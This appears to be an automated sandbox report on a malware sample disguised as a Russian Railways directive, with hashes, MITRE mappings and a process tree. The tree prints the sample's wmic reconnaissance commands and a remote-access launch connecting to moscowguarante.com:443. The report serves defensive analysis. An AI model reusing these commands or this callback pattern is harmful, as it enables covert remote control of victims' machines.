32df8c49d6f89722c6aca8943883cfff3cdf34074e87ff48f7c96da5d732c02b

Analysis

max time kernel
164s
max time network
165s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
10/04/2024, 10:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

РАСПОРЯЖЕНИЕ_ГЛАВНОГО_УПРАВЛЕНИЯ-РЖД.exe
Size

1.5MB
MD5

754bfba24b12db4bcbb9c241baaa2557
SHA1

439ccde358d0a93da24cd2049d0a48d760732bca
SHA256

a9799ed289b967be92f920616015e58ae6e27defaa48f377d3cd701d0915fe53
SHA512

b5860b0ff23de57415b6b40d5852ee8f1cbd94cf0e0fcdd774cc9952052e172ccc75768a49ba4d93059e9904a3e5edacdf698036e3b2bb4f5ceb5d1c895455ea
SSDEEP

24576:WKWseKuCdU9rkNPfgkGP5B8ZbiELKLVj6iDyHBzZKpiE3XxoW2X0Fk3l1pm:TFzDW9rIfHGhSZbiELAVjvyxZmiE3Oi5

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation	РАСПОРЯЖЕНИЕ_ГЛАВНОГО_УПРАВЛЕНИЯ-РЖД.exe
Key value queried	\REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation	cmd.exe

Executes dropped EXE 2 IoCs

pid	Process
2444	explorerr.exe
4052	explorerr.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
1572	timeout.exe
2260	timeout.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
1548	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000_Classes\Local Settings	cmd.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2392	AcroRd32.exe
2392	AcroRd32.exe
2392	AcroRd32.exe
2392	AcroRd32.exe
2392	AcroRd32.exe
2392	AcroRd32.exe
2392	AcroRd32.exe
2392	AcroRd32.exe
2392	AcroRd32.exe
2392	AcroRd32.exe
2392	AcroRd32.exe
2392	AcroRd32.exe
2392	AcroRd32.exe
2392	AcroRd32.exe
2392	AcroRd32.exe
2392	AcroRd32.exe
2392	AcroRd32.exe
2392	AcroRd32.exe
2392	AcroRd32.exe
2392	AcroRd32.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	3284	WMIC.exe
Token: SeSecurityPrivilege	3284	WMIC.exe
Token: SeTakeOwnershipPrivilege	3284	WMIC.exe
Token: SeLoadDriverPrivilege	3284	WMIC.exe
Token: SeSystemProfilePrivilege	3284	WMIC.exe
Token: SeSystemtimePrivilege	3284	WMIC.exe
Token: SeProfSingleProcessPrivilege	3284	WMIC.exe
Token: SeIncBasePriorityPrivilege	3284	WMIC.exe
Token: SeCreatePagefilePrivilege	3284	WMIC.exe
Token: SeBackupPrivilege	3284	WMIC.exe
Token: SeRestorePrivilege	3284	WMIC.exe
Token: SeShutdownPrivilege	3284	WMIC.exe
Token: SeDebugPrivilege	3284	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3284	WMIC.exe
Token: SeRemoteShutdownPrivilege	3284	WMIC.exe
Token: SeUndockPrivilege	3284	WMIC.exe
Token: SeManageVolumePrivilege	3284	WMIC.exe
Token: 33	3284	WMIC.exe
Token: 34	3284	WMIC.exe
Token: 35	3284	WMIC.exe
Token: 36	3284	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3284	WMIC.exe
Token: SeSecurityPrivilege	3284	WMIC.exe
Token: SeTakeOwnershipPrivilege	3284	WMIC.exe
Token: SeLoadDriverPrivilege	3284	WMIC.exe
Token: SeSystemProfilePrivilege	3284	WMIC.exe
Token: SeSystemtimePrivilege	3284	WMIC.exe
Token: SeProfSingleProcessPrivilege	3284	WMIC.exe
Token: SeIncBasePriorityPrivilege	3284	WMIC.exe
Token: SeCreatePagefilePrivilege	3284	WMIC.exe
Token: SeBackupPrivilege	3284	WMIC.exe
Token: SeRestorePrivilege	3284	WMIC.exe
Token: SeShutdownPrivilege	3284	WMIC.exe
Token: SeDebugPrivilege	3284	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3284	WMIC.exe
Token: SeRemoteShutdownPrivilege	3284	WMIC.exe
Token: SeUndockPrivilege	3284	WMIC.exe
Token: SeManageVolumePrivilege	3284	WMIC.exe
Token: 33	3284	WMIC.exe
Token: 34	3284	WMIC.exe
Token: 35	3284	WMIC.exe
Token: 36	3284	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4536	WMIC.exe
Token: SeSecurityPrivilege	4536	WMIC.exe
Token: SeTakeOwnershipPrivilege	4536	WMIC.exe
Token: SeLoadDriverPrivilege	4536	WMIC.exe
Token: SeSystemProfilePrivilege	4536	WMIC.exe
Token: SeSystemtimePrivilege	4536	WMIC.exe
Token: SeProfSingleProcessPrivilege	4536	WMIC.exe
Token: SeIncBasePriorityPrivilege	4536	WMIC.exe
Token: SeCreatePagefilePrivilege	4536	WMIC.exe
Token: SeBackupPrivilege	4536	WMIC.exe
Token: SeRestorePrivilege	4536	WMIC.exe
Token: SeShutdownPrivilege	4536	WMIC.exe
Token: SeDebugPrivilege	4536	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4536	WMIC.exe
Token: SeRemoteShutdownPrivilege	4536	WMIC.exe
Token: SeUndockPrivilege	4536	WMIC.exe
Token: SeManageVolumePrivilege	4536	WMIC.exe
Token: 33	4536	WMIC.exe
Token: 34	4536	WMIC.exe
Token: 35	4536	WMIC.exe
Token: 36	4536	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4536	WMIC.exe

Suspicious use of FindShellTrayWindow 41 IoCs

pid	Process
2392	AcroRd32.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe

Suspicious use of SendNotifyMessage 39 IoCs

pid	Process
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe
2444	explorerr.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
2392	AcroRd32.exe
2392	AcroRd32.exe
2392	AcroRd32.exe
2392	AcroRd32.exe
2392	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1204 wrote to memory of 4044	1204	РАСПОРЯЖЕНИЕ_ГЛАВНОГО_УПРАВЛЕНИЯ-РЖД.exe	88
PID 1204 wrote to memory of 4044	1204	РАСПОРЯЖЕНИЕ_ГЛАВНОГО_УПРАВЛЕНИЯ-РЖД.exe	88
PID 1204 wrote to memory of 4044	1204	РАСПОРЯЖЕНИЕ_ГЛАВНОГО_УПРАВЛЕНИЯ-РЖД.exe	88
PID 4044 wrote to memory of 2392	4044	cmd.exe	90
PID 4044 wrote to memory of 2392	4044	cmd.exe	90
PID 4044 wrote to memory of 2392	4044	cmd.exe	90
PID 4044 wrote to memory of 668	4044	cmd.exe	92
PID 4044 wrote to memory of 668	4044	cmd.exe	92
PID 4044 wrote to memory of 668	4044	cmd.exe	92
PID 668 wrote to memory of 3284	668	cmd.exe	94
PID 668 wrote to memory of 3284	668	cmd.exe	94
PID 668 wrote to memory of 3284	668	cmd.exe	94
PID 668 wrote to memory of 3972	668	cmd.exe	95
PID 668 wrote to memory of 3972	668	cmd.exe	95
PID 668 wrote to memory of 3972	668	cmd.exe	95
PID 4044 wrote to memory of 4508	4044	cmd.exe	97
PID 4044 wrote to memory of 4508	4044	cmd.exe	97
PID 4044 wrote to memory of 4508	4044	cmd.exe	97
PID 4508 wrote to memory of 4536	4508	cmd.exe	98
PID 4508 wrote to memory of 4536	4508	cmd.exe	98
PID 4508 wrote to memory of 4536	4508	cmd.exe	98
PID 4508 wrote to memory of 2016	4508	cmd.exe	99
PID 4508 wrote to memory of 2016	4508	cmd.exe	99
PID 4508 wrote to memory of 2016	4508	cmd.exe	99
PID 4044 wrote to memory of 1548	4044	cmd.exe	100
PID 4044 wrote to memory of 1548	4044	cmd.exe	100
PID 4044 wrote to memory of 1548	4044	cmd.exe	100
PID 4044 wrote to memory of 2444	4044	cmd.exe	101
PID 4044 wrote to memory of 2444	4044	cmd.exe	101
PID 4044 wrote to memory of 2444	4044	cmd.exe	101
PID 4044 wrote to memory of 2260	4044	cmd.exe	103
PID 4044 wrote to memory of 2260	4044	cmd.exe	103
PID 4044 wrote to memory of 2260	4044	cmd.exe	103
PID 4044 wrote to memory of 4052	4044	cmd.exe	106
PID 4044 wrote to memory of 4052	4044	cmd.exe	106
PID 4044 wrote to memory of 4052	4044	cmd.exe	106
PID 4044 wrote to memory of 1572	4044	cmd.exe	107
PID 4044 wrote to memory of 1572	4044	cmd.exe	107
PID 4044 wrote to memory of 1572	4044	cmd.exe	107
PID 2392 wrote to memory of 4464	2392	AcroRd32.exe	108
PID 2392 wrote to memory of 4464	2392	AcroRd32.exe	108
PID 2392 wrote to memory of 4464	2392	AcroRd32.exe	108
PID 4464 wrote to memory of 1320	4464	RdrCEF.exe	109
PID 4464 wrote to memory of 1320	4464	RdrCEF.exe	109
PID 4464 wrote to memory of 1320	4464	RdrCEF.exe	109
PID 4464 wrote to memory of 1320	4464	RdrCEF.exe	109
PID 4464 wrote to memory of 1320	4464	RdrCEF.exe	109
PID 4464 wrote to memory of 1320	4464	RdrCEF.exe	109
PID 4464 wrote to memory of 1320	4464	RdrCEF.exe	109
PID 4464 wrote to memory of 1320	4464	RdrCEF.exe	109
PID 4464 wrote to memory of 1320	4464	RdrCEF.exe	109
PID 4464 wrote to memory of 1320	4464	RdrCEF.exe	109
PID 4464 wrote to memory of 1320	4464	RdrCEF.exe	109
PID 4464 wrote to memory of 1320	4464	RdrCEF.exe	109
PID 4464 wrote to memory of 1320	4464	RdrCEF.exe	109
PID 4464 wrote to memory of 1320	4464	RdrCEF.exe	109
PID 4464 wrote to memory of 1320	4464	RdrCEF.exe	109
PID 4464 wrote to memory of 1320	4464	RdrCEF.exe	109
PID 4464 wrote to memory of 1320	4464	RdrCEF.exe	109
PID 4464 wrote to memory of 1320	4464	RdrCEF.exe	109
PID 4464 wrote to memory of 1320	4464	RdrCEF.exe	109
PID 4464 wrote to memory of 1320	4464	RdrCEF.exe	109
PID 4464 wrote to memory of 1320	4464	RdrCEF.exe	109
PID 4464 wrote to memory of 1320	4464	RdrCEF.exe	109

C:\Users\Admin\AppData\Local\Temp\РАСПОРЯЖЕНИЕ_ГЛАВНОГО_УПРАВЛЕНИЯ-РЖД.exe
"C:\Users\Admin\AppData\Local\Temp\РАСПОРЯЖЕНИЕ_ГЛАВНОГО_УПРАВЛЕНИЯ-РЖД.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1204
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Officee\60903.cmd" "
  2⤵
  - Checks computer location settings
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:4044
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\RZ.pdf"
    3⤵
    - Checks processor information in registry
    - Modifies Internet Explorer settings
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2392
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4464
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=11E9855EDADE6F2E492E7880CB9AA46F --mojo-platform-channel-handle=1772 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        
        PID:1320
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=9159401C3743D85BF8533B481C59AECF --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=9159401C3743D85BF8533B481C59AECF --renderer-client-id=2 --mojo-platform-channel-handle=1800 --allow-no-sandbox-job /prefetch:1
        5⤵
        
        PID:2224
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=7506C28366559E37BC36BC7AE32BF8F4 --mojo-platform-channel-handle=2340 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        
        PID:3144
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=9BC408587F38DCDDCAFF81E389ECF812 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=9BC408587F38DCDDCAFF81E389ECF812 --renderer-client-id=5 --mojo-platform-channel-handle=2000 --allow-no-sandbox-job /prefetch:1
        5⤵
        
        PID:1784
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=F87FAFE53C04808907080D4B02932206 --mojo-platform-channel-handle=2608 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        
        PID:1044
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=B40FC6163B3062C3592C2675DC61288C --mojo-platform-channel-handle=2368 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        
        PID:400
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic nic get MACAddress |find ":"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:668
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic nic get MACAddress
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3284
  - - C:\Windows\SysWOW64\find.exe
      find ":"
      4⤵
      PID:3972
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic useraccount where name='Admin' get sid | find "S-1"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4508
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic useraccount where name='Admin' get sid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4536
  - - C:\Windows\SysWOW64\find.exe
      find "S-1"
      4⤵
      PID:2016
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im explorerr.exe
    3⤵
    - Kills process with taskkill
    PID:1548
- - C:\Users\Admin\AppData\Roaming\Officee\explorerr.exe
    "C:\Users\Admin\AppData\Roaming\Officee\explorerr.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:2444
- - C:\Windows\SysWOW64\timeout.exe
    timeout /t 3
    3⤵
    - Delays execution with timeout.exe
    PID:2260
- - C:\Users\Admin\AppData\Roaming\Officee\explorerr.exe
    "C:\Users\Admin\AppData\Roaming\Officee\explorerr.exe" -autoreconnect -id:4A:65:E8:49:A0:69_OZLIASEW_S-1-5-21-609813121-2907144057-1731107329-1000 -connect moscowguarante.com:443
    3⤵
    - Executes dropped EXE
    PID:4052
- - C:\Windows\SysWOW64\timeout.exe
    timeout /t 5
    3⤵
    - Delays execution with timeout.exe
    PID:1572

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1520

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
64KB

MD5
86e3261b09fe9ecb8a2604934feaaf71

SHA1
70a6173f34ea4a06723392aba5d91f3c3173d933

SHA256
e8c2d708b296171f2a554677c3ba4f6b03935a0442de9ae4ef4596ab26e18192

SHA512
77af2ffa3f56f0bb0fdd531a66287aff234b86cf270b7f5ad540c3548ef2252a520a312650c87ef4c3e6291915b711fdc249d82c3a720715d35b1ec23fd2c6d5

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
36KB

MD5
b30d3becc8731792523d599d949e63f5

SHA1
19350257e42d7aee17fb3bf139a9d3adb330fad4

SHA256
b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

SHA512
523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
56KB

MD5
752a1f26b18748311b691c7d8fc20633

SHA1
c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

SHA256
111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

SHA512
a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

Download Submit
C:\Users\Admin\AppData\Roaming\Officee\60903.cmd

Filesize
858B

MD5
db70dfbca2cc8234a2d2dc0a5f00a68e

SHA1
cbc5640514e8b921be486b312abbed871ea2b884

SHA256
b6ff96193514aa11b6fc0e5d58e7dcdccedfa373ee4858a2da582e4eceae86c5

SHA512
813c01439064ee49ac413eb03bb433c31b6613d857c8c6c3f47651dd3747be39ef7502414601a35c76aa2f1222cafe5c8f42969610d3e50c34a3a4050fb32301

Download Submit
C:\Users\Admin\AppData\Roaming\Officee\MSRC4Plugin_for_sc.dsm

Filesize
66KB

MD5
54c6f440dce326a8f7f628d2bd0e757c

SHA1
